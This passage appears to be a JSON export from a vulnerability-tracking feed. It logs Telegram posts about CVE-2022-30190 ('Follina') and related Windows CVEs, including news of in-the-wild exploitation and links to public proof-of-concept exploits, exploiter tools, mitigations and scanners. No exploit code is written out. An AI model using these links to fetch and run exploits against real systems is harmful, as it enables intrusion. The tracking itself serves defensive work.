"https://www.hackbyte.org/microsoft-office-cve-2022-30190-vulnerability-follina-exploitation/", "creation_timestamp": "2022-06-03T08:12:32.000000Z"}, {"uuid": "40db59d0-02aa-4336-ab25-475554874960", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30198", "type": "seen", "source": "https://t.me/cibsecurity/51161", "content": "\u203c CVE-2022-41081 \u203c\n\nWindows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-10-11T22:32:09.000000Z"}, {"uuid": "2257b7c4-1c28-45d3-9296-c09e31780eb3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30193", "type": "seen", "source": "https://t.me/cibsecurity/44581", "content": "\u203c CVE-2022-30167 \u203c\n\nAV1 Video Extension Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-30193.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-16T02:26:46.000000Z"}, {"uuid": "b7c8fc33-b308-4fc9-a8e7-7d0e1afb9244", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30196", "type": "seen", "source": "https://t.me/cibsecurity/49688", "content": "\u203c CVE-2022-35833 \u203c\n\nWindows Secure Channel Denial of Service Vulnerability. This CVE ID is unique from CVE-2022-30196.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-09-13T22:25:48.000000Z"}, {"uuid": "d1825c9f-ef91-4a01-a640-679c2d8d74b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/reverse_dungeon/2018", "content": "\ud83d\udcc3 \u042d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u044f MSDT 0-Day (CVE-2022-30190)\n \n\u0412\u0447\u0435\u0440\u0430 \u043f\u043e\u044f\u0432\u0438\u043b\u043e\u0441\u044c \u0431\u0443\u0440\u043d\u043e\u0435 \u043e\u0431\u0441\u0443\u0436\u0434\u0435\u043d\u0438\u0435 \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0432 \u043a\u043e\u043c\u043f\u043e\u043d\u0435\u043d\u0442\u0435 Microsoft Windows Support Diagnostic Tool (MSDT), \u043f\u043e\u0437\u0432\u043e\u043b\u044f\u044e\u0449\u0435\u0439 \u0432\u044b\u043f\u043e\u043b\u043d\u0438\u0442\u044c \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u044b\u0439 \u043a\u043e\u0434 \u043d\u0430 \u043c\u0430\u0448\u0438\u043d\u0435 \u0436\u0435\u0440\u0442\u0432\u044b \u043f\u0440\u0438 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0438 \u0444\u0430\u0439\u043b\u0430, \u0442\u0430\u043a\u043e\u0433\u043e \u043a\u0430\u043a Word.\n\n\u041d\u0430\u0438\u0431\u043e\u043b\u0435\u0435 \u043f\u043e\u0434\u0440\u043e\u0431\u043d\u043e\u0435 \u043e\u043f\u0438\u0441\u0430\u043d\u0438\u0435 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432 \u0431\u043b\u043e\u0433\u0435 \u0414\u0436\u043e\u043d\u0430 \u0425\u0430\u043c\u043c\u043e\u043d\u0434\u0430, \u0430 \u0442\u0430\u043a\u0436\u0435 \u0441\u043c\u043e\u0442\u0440\u0438\u0442\u0435 \u0432\u0438\u0434\u0435\u043e \u043e\u0442 \u043d\u0435\u0433\u043e, \u0441 \u043f\u043e\u044f\u0441\u043d\u0435\u043d\u0438\u0435\u043c \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u0438 \u0438 \u043f\u0440\u0438\u043c\u0435\u0440\u043e\u043c \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0430\u0446\u0438\u0438. \u042d\u043a\u0441\u043f\u043b\u043e\u0438\u0442 \u0442\u0430\u043a\u0436\u0435 \u0434\u043e\u0441\u0442\u0443\u043f\u0435\u043d \u043f\u043e \u0441\u0441\u044b\u043b\u043a\u0435 \u043d\u0438\u0436\u0435.\n\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 \u0432\u0438\u0434\u0435\u043e\n\u0421\u0441\u044b\u043b\u043a\u0430 \u043d\u0430 PoC\n\n#redteam #rce #cve #windows", "creation_timestamp": "2022-06-02T14:10:28.000000Z"}, {"uuid": "8e60cbf5-b091-454f-89c6-6a9eec809530", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30192", "type": "seen", "source": "https://t.me/cibsecurity/45370", "content": "\u203c CVE-2022-33638 \u203c\n\nMicrosoft Edge (Chromium-based) Elevation of Privilege Vulnerability. This CVE ID is unique from CVE-2022-30192, CVE-2022-33639.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-29T20:37:41.000000Z"}, {"uuid": "9c7c4907-08df-46f0-b575-b82a2271f380", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/cibsecurity/43626", "content": "\u203c CVE-2022-30190 \u203c\n\nMicrosoft Windows Support Diagnostic Tool (MSDT) Remote Code Execution Vulnerability.\n\n\ud83d\udcd6 Read\n\nvia \"National Vulnerability Database\".", "creation_timestamp": "2022-06-02T00:24:57.000000Z"}, {"uuid": "53433230-d877-4499-8d44-80e2b73adc2c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/reverse_dungeon/2035", "content": "#cve #MSDT\n\n[ CVE-2022-30190 ]\n\nhttps://github.com/NafisiAslH/KnowledgeSharing/tree/main/CyberSecurity/Web/CVEs/CVE-2022/CVE-2022-30190?fbclid=IwAR0UczaWjJNKWTnlvZHCXsWhABuae0kDRKx3hj-wo0LS1y8TZ32HR5w9t3w", "creation_timestamp": "2022-06-03T13:07:43.000000Z"}, {"uuid": "bd322e21-7c68-47bc-a354-1d1028961fca", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47592", "content": "Chinese Threat Actors Exploiting 'Follina' Vulnerability\nhttps://www.securityweek.com/chinese-threat-actors-exploiting-follina-vulnerability\n\nThe Windows zero-day vulnerability identified as Follina and CVE-2022-30190 is being exploited in an increasing number of attacks, including by a Chinese APT group.\nread more (https://www.securityweek.com/chinese-threat-actors-exploiting-follina-vulnerability)", "creation_timestamp": "2022-06-01T12:55:45.000000Z"}, {"uuid": "e6051d57-6e6a-4230-aabe-31ee90585bfa", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/theninjaway1337/1120", "content": "Russian hackers start targeting Ukraine with Follina exploits\n\nUkraine's Computer Emergency Response Team (CERT) is warning that the Russian hacking group Sandworm may be exploiting Follina, a remote code execution vulnerability in Microsoft Windows Support Diagnostic Tool (MSDT) currently tracked as CVE-2022-30190.\nThe security issue can be triggered by either\u00a0opening or selecting a specially crafted document\u00a0and threat actors have been exploiting it in attacks since at least\u00a0April 2022.\n\nhttps://www.bleepingcomputer.com/news/security/russian-hackers-start-targeting-ukraine-with-follina-exploits/", "creation_timestamp": "2022-06-16T05:24:42.000000Z"}, {"uuid": "7a0492ac-091c-478e-bfe4-065bfd9bb499", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47630", "content": "Threat Advisory: CVE-2022-30190 \u2018Follina\u2019 \u2013 Severe Zero-day Vulnerability discovered in MSDT\nhttps://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/", "creation_timestamp": "2022-06-03T16:22:14.000000Z"}, {"uuid": "6e1c8fe6-6d8c-44e5-a5e7-ded22c0838f9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47631", "content": "A Zero-day Remote Code Execution Vulnerability with high severity has been identified as CVE-2022-30190 \u201cFOLLINA\u201d in Microsoft Windows...\nThe post Threat Advisory: CVE-2022-30190 \u2018Follina\u2019 \u2013 Severe Zero-day Vulnerability discovered in MSDT (https://blogs.quickheal.com/threat-advisory-cve-2022-30190-follina-severe-zero-day-vulnerability-discovered-in-msdt/) appeared first on Quick Heal Blog | Latest computer security news, tips, and advice (https://blogs.quickheal.com/).", "creation_timestamp": "2022-06-03T16:22:14.000000Z"}, {"uuid": "fd672d46-a1da-4ef4-9a01-d1d7c78f81c5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47699", "content": "'Follina' Vulnerability Exploited to Deliver Qbot, AsyncRAT, Other Malware\nhttps://www.securityweek.com/follina-vulnerability-exploited-deliver-qbot-asyncrat-other-malware\n\nSeveral malware families are being delivered using the recently disclosed Windows vulnerability identified as Follina and CVE-2022-30190, which remains without an official patch.\nread more (https://www.securityweek.com/follina-vulnerability-exploited-deliver-qbot-asyncrat-other-malware)", "creation_timestamp": "2022-06-09T16:13:49.000000Z"}, {"uuid": "b5145431-b081-4df4-bf75-51125c02432b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/information_security_channel/47738", "content": "Windows Updates Patch Actively Exploited 'Follina' Vulnerability\nhttps://www.securityweek.com/windows-updates-patch-actively-exploited-follina-vulnerability\n\nMicrosoft has fixed roughly 50 vulnerabilities with its June 2022 Patch Tuesday updates, including the actively exploited flaw known as Follina and CVE-2022-30190.\nread more (https://www.securityweek.com/windows-updates-patch-actively-exploited-follina-vulnerability)", "creation_timestamp": "2022-06-14T23:24:43.000000Z"}, {"uuid": "eccd4c12-eff8-458a-864b-47b015fba7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2127", "content": "#CVE-2022\n\nMitigates the \\\"Folina\\\"-ZeroDay (CVE-2022-30190)\n\nhttps://github.com/derco0n/mitigate-folina\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T23:38:43.000000Z"}, {"uuid": "775c3ff8-355e-4ab9-8d4d-585b5fe13b17", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/thehackernews/3605", "content": "Cybercriminals are leveraging exploits for CVE-2021-40444 and CVE-2022-30190 to execute code through malicious Word files. Once opened, LokiBot malware is downloaded, logging keystrokes, capturing screenshots, and stealing data.  \n \nRead: https://thehackernews.com/2023/07/cybercriminals-exploit-microsoft-word.html", "creation_timestamp": "2023-07-17T11:34:30.000000Z"}, {"uuid": "a06dfbd2-4288-4e01-ae7c-1fdc86eb325b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2567", "content": "#CVE-2022\nProof-of-concept app to overwrite fonts on iOS using CVE-2022-46689.\nhttps://github.com/zhuowei/WDBFontOverwrite\n\nThis repo contains payload for the CVE-2022-36067\nhttps://github.com/Prathamrajgor/Exploit-For-CVE-2022-36067\n\nProof of concept for CVE-2022-30190 (Follina).\n\nhttps://github.com/winstxnhdw/CVE-2022-30190\n\n@BlueRedTeam", "creation_timestamp": "2023-01-21T16:19:17.000000Z"}, {"uuid": "c035a73c-211f-4455-b1ee-a4e2ff04b7d6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/BlueRedTeam/2128", "content": "#CVE-2022\n\nThe CVE-2022-30190-follina Workarounds Patch\n\nhttps://github.com/suegdu/CVE-2022-30190-Follina-Patch\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T23:41:22.000000Z"}, {"uuid": "aa42b911-131b-4908-9694-ad61329cf132", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2129", "content": "#CVE-2022\n\nCVE-2022-30190 | MS-MSDT Follina One Click\n\nhttps://github.com/AchocolatechipPancake/MS-MSDT-Office-RCE-Follina\n\n@BlueRedTeam", "creation_timestamp": "2022-06-04T00:11:27.000000Z"}, {"uuid": "24bb56c6-e1fc-4ae3-874c-419c77acd708", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2144", "content": "#CVE-2022\n\nExploit Microsoft Zero-Day Vulnerability Follina (CVE-2022-30190)\n\nhttps://github.com/Hrishikesh7665/Follina_Exploiter_CLI\n\n@BlueRedTeam", "creation_timestamp": "2022-06-10T08:50:50.000000Z"}, {"uuid": "65319266-d74a-4a19-9e18-fa6b17634f72", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2169", "content": "#CVE-2022\n\nThese are two Python scripts compiled to easily and quickly apply temporary protection against the CVE-2022-30190 vulnerability (Follina)\n\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix\n\n@BlueRedTeam", "creation_timestamp": "2022-06-17T21:11:01.000000Z"}, {"uuid": "af48f052-65d4-47a6-b5ce-c64441c4aba4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2170", "content": "#CVE-2022\n\nThese are the source codes of the Python scripts to apply the temporary protection against the CVE-2022-30190 vulnerability (Follina)\n\nhttps://github.com/SrCroqueta/CVE-2022-30190_Temporary_Fix_Source_Code\n\n@BlueRedTeam", "creation_timestamp": "2022-06-23T22:53:37.000000Z"}, {"uuid": "10a5af03-e7d5-430e-83a5-4cb3914e8b3a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30198", "type": "seen", "source": "https://t.me/VulnerabilityNews/30350", "content": "Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-22035, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.\nPublished at: October 11, 2022 at 09:15PM\nView on website", "creation_timestamp": "2022-10-11T22:42:22.000000Z"}, {"uuid": "e18d2113-dc5b-4cd3-ac68-555ff0333d42", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/BlueRedTeam/2122", "content": "#CVE-2022\n\nCVE-2022-30190 or \\\"Follina\\\" 0day proof of concept\n\nhttps://github.com/rayorole/CVE-2022-30190\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T10:46:04.000000Z"}, {"uuid": "1f2c5904-d3ec-4c16-b438-19aff43fdafc", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2126", "content": "#CVE-2022\n\nA tool written in Go that scans files & directories for the Follina exploit (CVE-2022-30190)\n\nhttps://github.com/ErrorNoInternet/FollinaScanner\n\n@BlueRedTeam", "creation_timestamp": "2022-06-03T22:38:31.000000Z"}, {"uuid": "5b1a1056-2d58-4527-8cc9-de06f707c49e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/BlueRedTeam/2460", "content": "#CVE-2022\n\n[+] Implementation of CVE-2022-30190 in C\n\nhttps://github.com/mattjmillner/CVE-Smackdown\n\n\n\n\n[+] Exploit POC for CVE-2022-42055 for GL-iNet routers using firmware below 3.215\n\nhttps://github.com/gigaryte/cve-2022-42055\n\n\n@BlueRedTeam", "creation_timestamp": "2022-11-16T00:09:22.000000Z"}, {"uuid": "a0c89c4f-0c19-4979-a6ee-d26a8a5a5bb4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/haccking/8039", "content": "\u0422\u0440\u043e\u044f\u043d Qbot \u0443\u0436\u0435 \u0432\u0437\u044f\u043b \u043d\u0430 \u0432\u043e\u043e\u0440\u0443\u0436\u0435\u043d\u0438\u0435 \u0441\u0432\u0435\u0436\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u0432 Windows MSDT\n\n\u0418\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043f\u0440\u0435\u0434\u0443\u043f\u0440\u0435\u0434\u0438\u043b\u0438, \u0447\u0442\u043e \u043c\u0430\u043b\u0432\u0430\u0440\u044c Qbot \u0443\u0436\u0435 \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u0443\u0435\u0442 \u043d\u0435\u0438\u0441\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u043d\u0443\u044e \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043d\u0443\u043b\u0435\u0432\u043e\u0433\u043e \u0434\u043d\u044f \u0432 Windows MSDT, \u043a\u043e\u0442\u043e\u0440\u0430\u044f \u043d\u043e\u0441\u0438\u0442 \u043d\u0430\u0437\u0432\u0430\u043d\u0438\u0435 Follina.\n\n\u041d\u0430\u043f\u043e\u043c\u043d\u044e, \u0447\u0442\u043e \u043e\u0431 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0438 Follina\u00a0\u0441\u0442\u0430\u043b\u043e \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e\u00a0\u0432 \u043a\u043e\u043d\u0446\u0435 \u043c\u0430\u044f, \u0445\u043e\u0442\u044f \u043f\u0435\u0440\u0432\u044b\u0435 \u0438\u0441\u0441\u043b\u0435\u0434\u043e\u0432\u0430\u0442\u0435\u043b\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0438\u043b\u0438 \u0431\u0430\u0433 \u0435\u0449\u0435 \u0432 \u0430\u043f\u0440\u0435\u043b\u0435 2022 \u0433\u043e\u0434\u0430, \u043d\u043e \u0442\u043e\u0433\u0434\u0430 \u0432 Microsoft \u043e\u0442\u043a\u0430\u0437\u0430\u043b\u0438\u0441\u044c \u043f\u0440\u0438\u0437\u043d\u0430\u0442\u044c \u043f\u0440\u043e\u0431\u043b\u0435\u043c\u0443.\n\n\u0423\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c \u043e\u0442\u0441\u043b\u0435\u0436\u0438\u0432\u0430\u0435\u0442\u0441\u044f \u043f\u043e\u0434 \u0438\u0434\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0440\u043e\u043c\u00a0CVE-2022-30190, \u0438 \u0438\u0437\u0432\u0435\u0441\u0442\u043d\u043e, \u0447\u0442\u043e \u0435\u0435 \u043c\u043e\u0436\u043d\u043e \u044d\u043a\u0441\u043f\u043b\u0443\u0430\u0442\u0438\u0440\u043e\u0432\u0430\u0442\u044c \u0434\u043b\u044f \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043f\u0440\u043e\u0438\u0437\u0432\u043e\u043b\u044c\u043d\u043e\u0433\u043e \u043a\u043e\u0434\u0430 \u0447\u0435\u0440\u0435\u0437 \u043e\u0431\u044b\u0447\u043d\u043e\u0435 \u043e\u0442\u043a\u0440\u044b\u0442\u0438\u0435 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442\u0430 Word \u0438\u043b\u0438 \u043f\u0440\u0435\u0434\u0432\u0430\u0440\u0438\u0442\u0435\u043b\u044c\u043d\u044b\u0439 \u043f\u0440\u043e\u0441\u043c\u043e\u0442\u0440 \u0432 \u00ab\u041f\u0440\u043e\u0432\u043e\u0434\u043d\u0438\u043a\u0435\u00bb, \u043f\u0440\u0438\u0431\u0435\u0433\u0430\u044f \u043a \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044e \u0432\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u044b\u0445 \u043a\u043e\u043c\u0430\u043d\u0434 PowerShell \u0447\u0435\u0440\u0435\u0437 Microsoft Diagnostic Tool (MSDT).\n\nLife hack\ud83d\udc48", "creation_timestamp": "2022-06-10T15:36:44.000000Z"}, {"uuid": "e404c09f-662d-4a94-94e5-749023113599", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/haccking/8128", "content": "#\u041e\u0431\u0443\u0447\u0435\u043d\u0438\u0435\n\u041d\u043e\u0432\u0430\u044f \u0443\u044f\u0437\u0432\u0438\u043c\u043e\u0441\u0442\u044c Windows \u0434\u043b\u044f \u0443\u0434\u0430\u043b\u0451\u043d\u043d\u043e\u0433\u043e \u0432\u044b\u043f\u043e\u043b\u043d\u0435\u043d\u0438\u044f \u043a\u043e\u043c\u0430\u043d\u0434 \u0447\u0435\u0440\u0435\u0437 \u0434\u043e\u043a\u0443\u043c\u0435\u043d\u0442.doc -CVE-2022-30190", "creation_timestamp": "2022-06-26T17:45:36.000000Z"}, {"uuid": "ace34b7d-b44a-4437-be39-59d1eceed6de", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/CNArsenal/575", "content": "https://github.com/aminetitrofine/CVE-2022-30190\n#github", "creation_timestamp": "2023-05-17T06:06:06.000000Z"}, {"uuid": "813cdaea-4d98-4123-b3b0-7110caf0aa89", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30198", "type": "seen", "source": "https://t.me/VulnerabilityNews/30351", "content": "Windows Point-to-Point Tunneling Protocol Remote Code Execution Vulnerability. This CVE ID is unique from CVE-2022-24504, CVE-2022-30198, CVE-2022-33634, CVE-2022-38000, CVE-2022-38047, CVE-2022-41081.\nPublished at: October 11, 2022 at 09:15PM\nView on website", "creation_timestamp": "2022-10-11T22:42:23.000000Z"}, {"uuid": "16a27f7f-73cc-47e6-93d6-a765be7e45a6", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "Telegram/DWuFghBm9DmmJST6bI9NuBgV03ST9Bw0n5hEo3vRPn0EqYFb", "content": "", "creation_timestamp": "2022-06-26T02:15:48.000000Z"}, {"uuid": "28181135-aef1-464a-9aa0-65ca6075b57b", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/arvin_club/5491", "content": "https://github.com/JMousqueton/PoC-CVE-2022-30190", "creation_timestamp": "2022-06-01T20:49:44.000000Z"}, {"uuid": "87dfe89e-f093-4691-8b96-26eb71786619", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "published-proof-of-concept", "source": "https://t.me/dragonforceio/739", "content": "P0c Patch / Fix 0day CVE-2022-30190 follina\n\nBy : impossible1337\nhttps://dragonforce.io/threads/0day-cve-2022-30190-follina-p0c-and-fix.13144/ \nForum Rasmi: https://dragonforce.io\nRadio Rasmi: https://radio.dragonforce.io\nFacebook: https://fb.me/dragonforcedotio\nTelegram: https://t.me/dragonforceio\nTwitter: https://twitter.com/dragonforceio\nYoutube: https://www.youtube.com/channel/UC9GycRXuy7-WMULPBkBp4Bw", "creation_timestamp": "2022-06-03T03:00:12.000000Z"}, {"uuid": "258f83bb-1699-47d7-9506-6e6484a52698", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "exploited", "source": "https://t.me/dragonforceio/740", "content": "https://dragonforce.io/threads/0day-cve-2022-30190-follina-p0c-and-fix.13144/", "creation_timestamp": "2022-06-03T03:01:35.000000Z"}, {"uuid": "4299621d-9db9-4d4b-9bda-24b584db7c5e", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "https://t.me/CyberSecurityTechnologies/6326", "content": "#Analytics\nTop 10 Most Used Vulns of the Month (June 1-30)\n\nCVE-2022-30190 - Follina exploit\nCVE-2022-26134 - OGNL injection in Atlassian Confluence Server/Data Center\nCVE-2022-26809 - Weakness in a core Windows 7/10/Srv19/22 component (RPC)\nCVE-2022-30075 - TP-Link AX50 Auth RCE\nCVE-2022-23222 - Linux Kernel eBPF LPE\nCVE-2022-32275 - Grafana 8.4.3 allows reading files\nCVE-2022-26937 - Windows NFS NLM Portmap Stack Buffer Overflow\nCVE-2022-23088 - Heap Overflow in FreeBSD Wi-Fi Stack\nCVE-2022-31626 - RCE in PHP <=7.4.29\nCVE-2022-30333 - Dir Traversal in rar", "creation_timestamp": "2024-10-12T06:49:41.000000Z"}, {"uuid": "2ecfd10c-7629-494e-9271-8b2bb2e9dac5", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/DCCFDjEFPe2QLNEHc05lpgLck17TBTfpWb2O-MdC7HDPV7nK", "content": "", "creation_timestamp": "2024-02-07T16:12:29.000000Z"}, {"uuid": "ac38b779-fea3-4e0b-be04-830a68121412", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/mvPWI4un1-iOOZzGwGGDI0e0CA6ey2wKq3zB3-h9s87VgtZ8", "content": "", "creation_timestamp": "2024-02-07T16:16:30.000000Z"}, {"uuid": "4fe8b63e-8222-4521-b938-62e223ebde79", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", "vulnerability": "CVE-2022-30190", "type": "seen", "source": "Telegram/7jzKcU8HVGZTkZZWwuUB25CufDvypfib6CwwM-UlhM1Jf1Mq", "content": "", "creation_timestamp": "2024-02-07T16:16:55.000000Z"}, {"uuid": "04e7299b-b9d8-4bfa-b1a4-4541328fcd60", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "9f56dd64-161d-43a6-b9c3-555944290a09", 